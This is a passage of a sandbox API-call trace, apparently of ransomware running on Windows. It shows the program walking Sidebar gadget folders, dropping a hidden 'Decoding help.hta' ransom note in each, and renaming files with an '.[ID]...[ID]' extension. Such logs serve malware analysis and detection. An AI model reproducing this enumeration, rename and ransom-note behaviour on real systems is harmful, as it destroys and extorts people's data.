cAlternateFileName="")) returned 1 [0058.071] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0058.071] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0058.071] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0058.071] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0058.071] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 64 [0058.071] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US" [0058.071] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\en-US\\*.*" [0058.071] GlobalMemoryStatus (in: lpBuffer=0x1d49fd10 | out: lpBuffer=0x1d49fd10) [0058.071] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9942b20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x418 [0058.072] CloseHandle (hObject=0x418) returned 1 [0058.072] FindNextFileW (in: hFindFile=0x5d8790, lpFindFileData=0x1d49fd30 | out: lpFindFileData=0x1d49fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x296c7da5, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x296c7da5, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x296c7da5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1ae9, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0058.072] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0058.072] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 64 [0058.072] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta" [0058.072] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\decoding help.hta")) returned 0x1 [0058.072] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0058.072] lstrlenW (lpString="icon.png") returned 8 [0058.072] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0058.072] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 64 [0058.072] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png" [0058.072] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png" [0058.072] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.072] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.072] FindNextFileW (in: hFindFile=0x5d8790, lpFindFileData=0x1d49fd30 | out: lpFindFileData=0x1d49fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8063a49c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8063a49c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0058.073] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0058.073] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0058.073] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0058.073] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0058.073] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 64 [0058.073] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images" [0058.073] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\*.*" [0058.073] GlobalMemoryStatus (in: lpBuffer=0x1d49fd10 | out: lpBuffer=0x1d49fd10) [0058.073] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5e10a08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x418 [0058.074] CloseHandle (hObject=0x418) returned 1 [0058.074] FindNextFileW (in: hFindFile=0x5d8790, lpFindFileData=0x1d49fd30 | out: lpFindFileData=0x1d49fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x870fc289, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x870fc289, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29e5e35f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x172a, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0058.074] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0058.074] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 64 [0058.074] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta" [0058.074] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\decoding help.hta")) returned 0x1 [0058.074] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0058.074] lstrlenW (lpString="logo.png") returned 8 [0058.074] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0058.074] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 64 [0058.074] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png" [0058.074] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png" [0058.074] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.074] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.074] FindNextFileW (in: hFindFile=0x5d8790, lpFindFileData=0x1d49fd30 | out: lpFindFileData=0x1d49fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x870fc289, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x870fc289, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29e5e35f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x172a, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0058.074] FindClose (in: hFindFile=0x5d8790 | out: hFindFile=0x5d8790) returned 1 Thread: id = 447 os_tid = 0x894 [0044.832] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*", lpFindFileData=0x1d5dfd30 | out: lpFindFileData=0x1d5dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1afe884, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8df54c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671cb0 [0050.671] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.671] FindNextFileW (in: hFindFile=0x671cb0, lpFindFileData=0x1d5dfd30 | out: lpFindFileData=0x1d5dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1afe884, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8df54c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.671] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.671] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.671] FindNextFileW (in: hFindFile=0x671cb0, lpFindFileData=0x1d5dfd30 | out: lpFindFileData=0x1d5dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b24af3, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1b4ad62, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0050.671] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0050.671] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0050.671] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0050.674] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" [0050.674] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned 67 [0050.674] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css" [0050.675] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\css\\*.*" [0050.675] GlobalMemoryStatus (in: lpBuffer=0x1d5dfd10 | out: lpBuffer=0x1d5dfd10) [0050.675] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x252e7f88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x24c [0050.757] CloseHandle (hObject=0x24c) returned 1 [0050.757] FindNextFileW (in: hFindFile=0x671cb0, lpFindFileData=0x1d5dfd30 | out: lpFindFileData=0x1d5dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b4ad62, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa48ceb9, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1b4ad62, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0050.757] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0050.757] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0050.757] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0050.760] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" [0050.760] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned 67 [0050.760] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US" [0050.760] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\en-US\\*.*" [0050.760] GlobalMemoryStatus (in: lpBuffer=0x1d5dfd10 | out: lpBuffer=0x1d5dfd10) [0050.760] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x25360190, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x24c [0050.768] CloseHandle (hObject=0x24c) returned 1 [0050.768] FindNextFileW (in: hFindFile=0x671cb0, lpFindFileData=0x1d5dfd30 | out: lpFindFileData=0x1d5dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9015ef3, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xc9015ef3, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x3fb81591, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x19f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="flyout.html", cAlternateFileName="")) returned 1 [0050.768] lstrcpyW (in: lpString1=0x25390260, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" [0050.768] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned 67 [0050.769] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\Decoding help.hta" [0050.769] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\decoding help.hta")) returned 0xffffffff [0050.769] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x614 [0052.692] WriteFile (in: hFile=0x614, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1d5dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1d5dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.030] CloseHandle (hObject=0x614) returned 1 [0055.317] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.161] lstrcmpiW (lpString1="Decoding help.hta", lpString2="flyout.html") returned -1 [0058.161] lstrlenW (lpString="flyout.html") returned 11 [0058.161] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" [0058.162] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned 67 [0058.162] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\", lpString2="flyout.html" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\flyout.html") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\flyout.html" [0058.162] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\flyout.html" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\flyout.html") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\flyout.html" [0058.162] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\flyout.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\flyout.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\flyout.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.162] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\flyout.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\flyout.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\flyout.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\mediacenter.gadget\\flyout.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.071] FindNextFileW (in: hFindFile=0x671cb0, lpFindFileData=0x1d5dfd30 | out: lpFindFileData=0x1d5dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1b4ad62, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0059.071] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0059.071] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0059.071] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0059.072] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" [0059.072] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned 67 [0059.072] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images" [0059.072] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\images\\*.*" [0059.072] GlobalMemoryStatus (in: lpBuffer=0x1d5dfd10 | out: lpBuffer=0x1d5dfd10) [0059.072] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x115794c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd74 [0059.073] CloseHandle (hObject=0xd74) returned 1 [0059.073] FindNextFileW (in: hFindFile=0x671cb0, lpFindFileData=0x1d5dfd30 | out: lpFindFileData=0x1d5dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1cc85b8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0059.073] lstrcmpW (lpString1=".", lpString2="js") returned -1 [0059.073] lstrcmpW (lpString1="..", lpString2="js") returned -1 [0059.073] lstrcmpiW (lpString1="windows", lpString2="js") returned 1 [0059.073] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" [0059.073] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned 67 [0059.073] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\", lpString2="js" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\js" [0059.073] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows 